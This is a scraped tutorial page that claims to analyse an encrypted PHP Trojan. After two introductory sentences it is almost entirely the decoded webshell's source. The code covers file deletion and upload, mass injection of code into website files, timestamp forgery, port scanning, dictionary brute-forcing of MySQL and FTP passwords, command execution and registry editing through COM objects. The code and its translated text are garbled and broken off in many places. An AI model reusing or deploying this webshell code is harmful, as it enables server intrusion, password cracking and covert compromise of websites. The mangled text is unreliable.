Home > Article > Backend Development > PHP Trojan Analysis (Encryption Cracking)_PHP Tutorial
Analysis shows that this Trojan is encoded with base64 and then compressed. Although relevant confidentiality measures have been taken, the PHP code must be executed and it will eventually generate PHP source code, so the following PHP program is written to decode, decompress, and write it to a file.
The decoding and decompression code is as follows:
Automatically exit after three seconds Or click here to exit the program interface>>>
";exit;}获取 URL 内容失败
'.$_SERVER['HTTP_HOST'].' | '.date(" Y year m month d day h:i:s",time()).' | '.gethostbyname($_SERVER['SERVER_NAME']) .' |
n";
// Delete file
if (!empty( $delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." Deletion successful!" : "File deletion failed!";
} else {
echo basename($delfile)."The file no longer exists!";
}
}
//Delete directory
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs") ) {
, with with with with with the . > }
}
// Create directory
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory) ) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "The directory already exists!";
} else {
> echo (@mkdir("$mkdirs",0777)) ? "Directory creation successful!" : "Creation failed!";
@chmod("$mkdirs",0777);
}
}
}
// Upload file
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir. "/".$_FILES['uploadfile']['name']."")) ? "Upload successful!" : "Upload failed!";
}
elseif($action=="mysqlup" ){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo "No file selected to upload.";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile' ]['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "Login failed".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" The operation was successful. The file was successfully uploaded to ".$host.", and the file name was ".$uppath."/ ".$upname."..";
}else{ . 🎜>}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// Edit file
elseif ($_POST[' do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if ($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename" ;
@$fp=fopen("$filename","w"); >".$_POST['filecontent']."";
$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "< ;?phpn/*nThe code is encrypted by the light blue radiant fish!n*/neval(gzinflate(base64_decode('$filecontent'))));n"."?>"; filecontent = $_POST['filecontent'];
fclose($fp);
if($retime=="yes"){
echo" Yuyu automatic operation: ";
echo $msg=@touch($filename,$time) ? " Modify the file as ". $ Time2." Success! ":" Modify the file time failed! ";
}
} else {
echo" Please enter the file name you want to edit! ";
}
}
//File download
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo "Unable to read the data to download";
}
elseif(file_exists($path)){
echo "Sorry, file". $path." already exists, please change the save file name.";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "File downloaded successfully!" : " Download file failed to write!";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if (!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST[' mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? "Decompression successful!" : "Is this directory not writable? !";
fclose($fp);
}else{
echo"Isn’t it?".$_POST['mixto']."Already exists~";
}
}
// Edit file properties
elseif ($_POST['do'] == 'editfileperm ') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod( $dir."/".$file,$fileperm)) ? "Attribute modified successfully!" : "Modification failed!";
echo "File ".$file." The modified attributes are: ".substr( base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "Please enter the attributes you want to set!";
}
}
// File rename
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST[ 'newname']." Already exists, please re-enter one!";
'])." Successfully changed the name to ".$_POST['newname']." !" : "Failed to modify the file name!";
}
} else { The file name!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo " Search keywords: [".$oldkey."], the search results are shown below: ";
if($type2 == "getpath"){
echo "Move the mouse over the result file and a partial screenshot will be displayed.";
}
echo"
";
find( $path);
}else{
echo "You want to check for shrimps? Do you want to check for shrimps? Are there any shrimps that you want to check?";
}
}
elseif ($ _GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action' ] == "plgm") {
$action = '?action=plgmok';
$gm = "";
$tb->tableheader();
$tb->formheader($action,'Batch horse mounting');
$tb- >tdbody('Website batch horse-mounting program php version','center');
$tb->tdbody('File location: '.$tb->makeinput('dir',''.$ _SERVER["DOCUMENT_ROOT"].'','','text','60').'
Code to be linked:'.$tb->maketextarea('mm',$gm,'50' ,'5').''.$tb->makehidden('do','Batch horse hanging').'
'.$tb->makeinput('submit','Start horse hanging' ,'','submit'),'center','1','35');
echo "";
$tb->tablefooter();
} //end plgm
// Clone time
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "The file to be referenced does not exist!"; ";
} else { The modification time of basename($_POST['curfile'])." was successfully changed to ".date("Y-m-d H:i:s",$time)." !" : "The modification time of the file failed!";
}
}
}
// Custom time
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists( $_POST['curfile'])) {
echo "The file to be modified does not exist!";
}else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
";
}
}
/*
这里代码写得很杂,说实话我自己都不知道写了什么。
好在能用,我就没管了,假设有人看到干脆重写吧。*/
elseif ($do == 'crack') {//反正注册为全局变量了。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "获取".$user."的密码为".$tmp[$i]."";
}
}
if(!$t){
echo "字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>>
全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。";
}
else {
echo"$t";
}
}
}else{
echo"字典文件不存在,请确定。“; ,",$port);
$count = count($tmp); ;
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i<$count;$ i++){
If(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
If ($ FP) Echo "Discover". $ Host. "The host opened the port". $ TMP [$ i]. "& Lt; br & gt;";
} else {
$ fp = @fsockopen ( $ Host, $ i, $ ERRNO, $ EERSTR, 1);
IF ($ FP) echo ". $ Host." The host opened the port ". $ i." & lt; ";
$dbname)) {
echo "Database connection successful!";
mysql_close();
} else {
echo mysql_error();
}
}
//Execute SQL statement
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Database connection failed");
@mysql_select_db($dbname) or die("Failed to select database");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL statement successful Execute!" : "Error: ".mysql_error();
mysql_close();
}
// Backup operation
elseif ($_POST['do'] == 'backupmysql ') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "Please select the data table to be backed up and the backup method!";
🎜> @mysql_select_db($dbname) or die ("Failed to select database"); );
if ($filehandle) {
$result = mysql_query("SHOW tables"); 🎜> while ( $currow = mysql_fetch_array($result)) {
fwrite($ filehandle,"nnn");
fclose($filehandle); "";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/ ".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d =0;
for($i=0;$i<$count;$i++) {
>Extract($zipfile,$path,$i)>0) $f++;
"$dl[0] decompressed to ".$path." successfully
($f files$d directories)";
elseif($f==0) echo "$dl[0] decompressed Failed to reach ".$path.";
else echo "$dl[0] is not fully decompressed
($f files and $d directories have been decompressed)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
$zipfile=$ dir."/".$dl[$k];
ray($dl[$k]);
$filesize=@filesize($dir." /".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($ fp,$filesize));
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "Directory".$dir."No write permission!";
@fclose($fp); Pack the downloaded files!";
}
}
// Shell.Application run the program
elseif(($_POST['do'] == 'programrun') AND !empty($_POST ['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell-> ;ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "The program has been executed successfully!" : "The program failed to run!";
}
// View PHP configuration parameter status
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "Configuration parameters".$_POST['phpvarname']." Detection result: ".getphpcfg($_POST['phpvarname'])."";
}
// Read the registry
elseif (($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// Write to the registry
elseif(($regwrite) AND !empty($ _POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'. 'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "Write registry key value successfully!" : "Write ".$_POST['regname'].", ".$_POST['regval']. ", ".$_POST['regtype']." Failed!";
}
// Delete registry
elseif(($regdelete) AND !empty($_POST['delregname']) ) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST ['delregname']);
echo ($a=='0') ? "Delete registry key value successfully!" : "Delete ".$_POST['delregname']." Failed!";
}
else {
echo "$notice";
echo "ProgrampcAnywhere | Start Programs | AllUsers | Serv-U | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':' ;
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\";}
}
}
echo "